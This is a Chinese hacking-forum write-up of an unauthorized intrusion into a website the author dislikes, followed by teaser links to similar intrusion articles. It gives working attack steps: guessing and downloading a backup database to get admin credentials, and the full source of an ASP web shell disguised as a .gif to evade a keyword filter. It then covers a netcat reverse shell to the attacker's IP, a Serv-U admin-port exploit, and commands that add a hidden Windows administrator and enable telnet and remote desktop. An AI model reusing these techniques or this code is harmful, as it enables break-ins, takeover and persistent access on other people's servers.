突破一流信息监控系统传木马并获得系统权限

所属分类: 网络安全 / 黑客入侵 阅读数: 1733
收藏 0 赞 0 分享
今天终于GK完了
无聊闲逛在网上,意识催魂试的找我要文章...
哈~发现一迷信网站,不爽...
(入侵需要理由吗?不需要吗?需要吗?....) 用
telnet www.xxx.com 80 get enter HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Wed, 08 Jun 2005 11:56:00 GMT
Content-Type: text/html
Content-Length: 87 <html><head><title>Error</title></he
</html> 失去了跟主机的连接。 F:\Documents and Settings\lu\桌面> 看到没,获得很多有用的信息哦 先去WEB上看看有没有什么漏洞 哈!发现DVBBS7.1 论坛 前几天有朋友告诉我件事情,说有许多白痴管理员用备分的日期做备分数据库的名字哦!试试看! dvbbs7.1 是4月6日更新的,他用该用200504**.mdb做名字来命名以前的旧数据库!
没办法,试试! http://www.xxxx.com/bbs/databackup/20050406.mdb
http://www.xxxx.com/bbs/databackup/20050407.mdb
http://www.xxxx.com/bbs/databackup/20050408.mdb
.....
晕..到32了还没出来
管理员不是白痴哦!
http://www.xxxx.com/bbs/databackup/200504.mdb
faint!他不是白痴谁是!
跳出了可爱的下载对话框! downloading.... 完成! 用辅臣数据库浏览器打开,选择Dv_Log(2586)
字段名选择l_content 关键字添password2 点查询
许多信息出来了哦!
经过筛选
发现一条:
oldusername=叼防&username2=叼防&password2=19841202&adduser=叼防&id=12&Submit=更 新 哈,想到什么了?登陆啊,不过用户名不知道,是葛飞吗~开玩笑,那简单,其实转化这个我用他本身的页面,
在登陆页面上用户名和密码乱添
点登陆
http://www.xxx.com/bbs/showerr.asp?BoardID=0&ErrCodes=10,11&action=填写登录信息 填写登录信息这句话意思是“填写登录信息” 那么就把填写登录信息换成叼防! 提交!看到了吧!用户名是“叼防”
晕!
什么名字啊!不管了,登陆!
成功!呵呵~把老兵的asp站长助手另存为admin_system321.gif 上传! 晕! 一流信息监控系统提醒您:很抱歉,由于您提交的内容中或访问的内容中含有系统不允许的关键词或者您的IP受到了访问限制,本次操作无效,系统已记录您的IP及您提交的所有数据。请注意,不要提交任何违反国家规定的内容!本次拦截的相关信息为:drop table 换海阳top的传,在晕...还是被拦截! 不行!我就不信上不去! <object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<%if err then%>
<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
<%
end if %>
<form method="post">
<input type=text name="cmdx" size=60 value="/cmd.exe"><br>
<input type=text name="cmd" size=60><br>
<input type=submit value="cmd"></form>
<textarea readonly cols=80 rows=20>
<%On Error Resume Next
if request("cmdx")="cmd.exe" then
response.write oScriptlhn.exec("cmd.exe /c"&request("cmd")).stdout.readall
end if
response.write oScriptlhn.exec(request("cmdx")&" /c"&request("cmd")).stdout.readall
%>
</textarea> 保存成为cmd.gif
上传成功!
登陆后台用数据库管理还原成根目录下的admin_system321.asp _system321.asp">http://www.xxx.com/bbs/admin_system321.asp 登陆,啊...CMD窗口那里显示 无法找到该页
您正在搜索的页面可能已经删除、更名或暂时不可用。
-------------------------------------------------------------------------------- 请尝试以下操作: 确保浏览器的地址栏中显示的网站地址的拼写和格式正确无误。
如果通过单击链接而到达了该网页,请与网站管理员联系,通知他们该链接的格式不正确。
单击后退按钮尝试另一个链接。
HTTP 错误 404 - 文件或目录未找到。
Internet 信息服务 (IIS) -------------------------------------------------------------------------------- 技术信息(为技术支持人员提供) 转到 Microsoft 产品支持服务并搜索包括“HTTP”和“404”的标题。
打开“IIS 帮助”(可在 IIS 管理器 (inetmgr) 中访问),然后搜索标题为“网站设置”、“常规管理任务”和“关于自定义错误消息”的主题。 把我的SYSTEM32下的CMD.exe用记事本打开,另存为111.gif上传!
在用刚才的方法备分成跟目录下的cmd.exe 把刚才cmd.gif里cmd.exe改成他的绝对路径 全都上传!然后备分!
访问_system321.asp">http://www.xxx.com/bbs/admin_system321.asp
哈!成功!
在用上面的方法把nc传上去!
本地命令提示符执行 nc -vv -l -p 9999
在webshell里执行nc.exe -e cmd.exe 自己IP 9999
NC监听的窗口就出现一个可爱的SHELL 在写个文件如下 echo USER LocalAdministrator>2.txt
echo PASS #l@$ak#.lk;0@P>>2.txt
echo SITE MAINTENANCE>>2.txt
echo -setdomain>>2.txt
echo -Domain=MyFTP^|0.0.0.0^|22^|-1^|1^|0 >>2.txt
echo -DynDNSEnable=0 >>2.txt
echo DynIPName=>>2.txt
echo -SETUSERSETUP>>2.txt
echo -IP=0.0.0.0>>2.txt
echo -PortNo=22>>2.txt
echo -User=tyrant>>2.txt
echo -Password=19851011>>2.txt
echo -HomeDir=c:\>>2.txt
echo -Maintenance=System>>2.txt
echo -Ratios=None>>2.txt
echo Access=c:\^|RWAMEICDP>>2.txt
echo -GETUSERSETUP>>2.txt "^"符号的作用相信大家都了解吧!我不罗嗦了。 把上面批处理保存为1.txt 在SHELL中用NC提交 nc 127.0.0.1 43958 <1.txt 回显发现 220 Domain settings saved
200-User=test1
200 User settings saved 成功了!成功添加了用户tyrant密码19851011 登陆对方的ftp
转到system32文件夹下 quote site exec "net.exe user tyrant 19851011 /add" quote site exec "net.exe localgroup administrators tyrant /add" quote site exec "net.exe user start telnet" 用tyrant管理员telnet上去
传个批处理开3389 哈...正在连接到... 文章到此结束
更多精彩内容其他人还在看

黑客技术讲解 网吧入侵方法大搜罗

首先,我们了解被破坏网吧的客观环境,要了解网吧人员的实地监测等。尤其要注意看有没有闭路电视监控。如果网吧人员对你的个人资料相当熟悉,就住手免的惹麻烦了。部分网吧要出示身份证也不要破坏了,免的惹麻烦。以下破坏方法不分先后,请量力灵活运用若干破坏组合。具体
收藏 0 赞 0 分享

通过Asp入侵Webserver

通过asp入侵web server,窃取文件毁坏系统,这决非耸人听闻... iis的安全性问题 1.iis3/pws的漏洞 我实验过,win98 pws上运行ASP程序,只须在浏览器地址栏内多加一个小数点ASP程序就会被下载下来。IIS3听说也有同样的问题,
收藏 0 赞 0 分享

详尽的IPC$入侵

一 唠叨一下: 网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄. 不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步
收藏 0 赞 0 分享

如何入侵ADSL

这是一位所谓的"黑客"的口述,你不妨看一下,也许你看完后对他的技术性做法不是完全明白,但是你肯定会感到一身冷汗,因为我们现在使用ADSL已经日益广泛,但我们的安全意识还不是很强.听完他的口述希望大家在日后能加强安全防范! 口述: 也许看烂了网上已有的
收藏 0 赞 0 分享

看我来入侵复旦大学(图)

一、师出有名 某日十分无聊,就和X论坛的超级版主wyzhack瞎吹牛,东年西扯的。后来不知道怎么的扯到复旦去了,他提议说不如我们黑掉复旦吧。正好当时也比较清闲,就答应一起看看了,嘿嘿。这次跑去黑复旦纯粹是为了练习技术。 二、战略部署 这次要拿的
收藏 0 赞 0 分享

领土之争——入侵某视讯服务器回忆录

老早就打算写这样一篇文章:能够细致地反映出入侵中攻防的具体内容,我想这比单纯的技术文章有趣的多。有鉴于此,我将尽力完整描述入侵过程中的思考方式。 1.石榴裙下的kk 说实话,就第一次拿到权限而言,没有多少技术含量。我花了N久时间收集KK网络的各种信息,最终
收藏 0 赞 0 分享

黑客攻防实战之对有防火墙网站入侵过程

前几天群里的兄弟给了一个网站,问我可不可以入侵。   一、踩点   ping www.111.com 发现超时,可以是有防火墙或做了策略。再用superscan扫一下,发现开放的端口有很多个,初步估计是软件防火墙。   二、注入   从源文件里搜索关键字asp
收藏 0 赞 0 分享

看看黑客都在偷窥什么!入侵个人电脑揭密(图)

前几天看《南国早报》说一位女孩个人电脑被黑客入侵控制,把裸照发到网上威胁女孩的事。联想到最近网上这样的事挺多的,就想给大家说说怎么防范。 其实现在的网络真的不安全~只要你的电脑连接上网络就存在一定的风险。黑客并不是万能的,他们入侵的电脑都是存在比较严重
收藏 0 赞 0 分享

XSS Phishing - 新式跨站脚本攻击方式(图)

最近跨站脚本漏洞好像比较火,国内的一些比较出名的WEB程序都陆续暴出了跨站脚本漏洞,但是一提到跨站脚本漏洞的攻击方式大家都哑火了,因为在常规的概念中这种漏洞最多是挂网页木马,获取COOKIE之类,属于典型的鸡肋漏洞! 跨站脚本攻击最大的魅力是通过HTML注
收藏 0 赞 0 分享

PHP数据库安全之SQL注入

$offset = $argv[0]; // 注意,没有输入验证!   $query = "SELECT id, name FROM products ORDER BY name LIMIT 20 OFFSET $offset;";   $resu
收藏 0 赞 0 分享
查看更多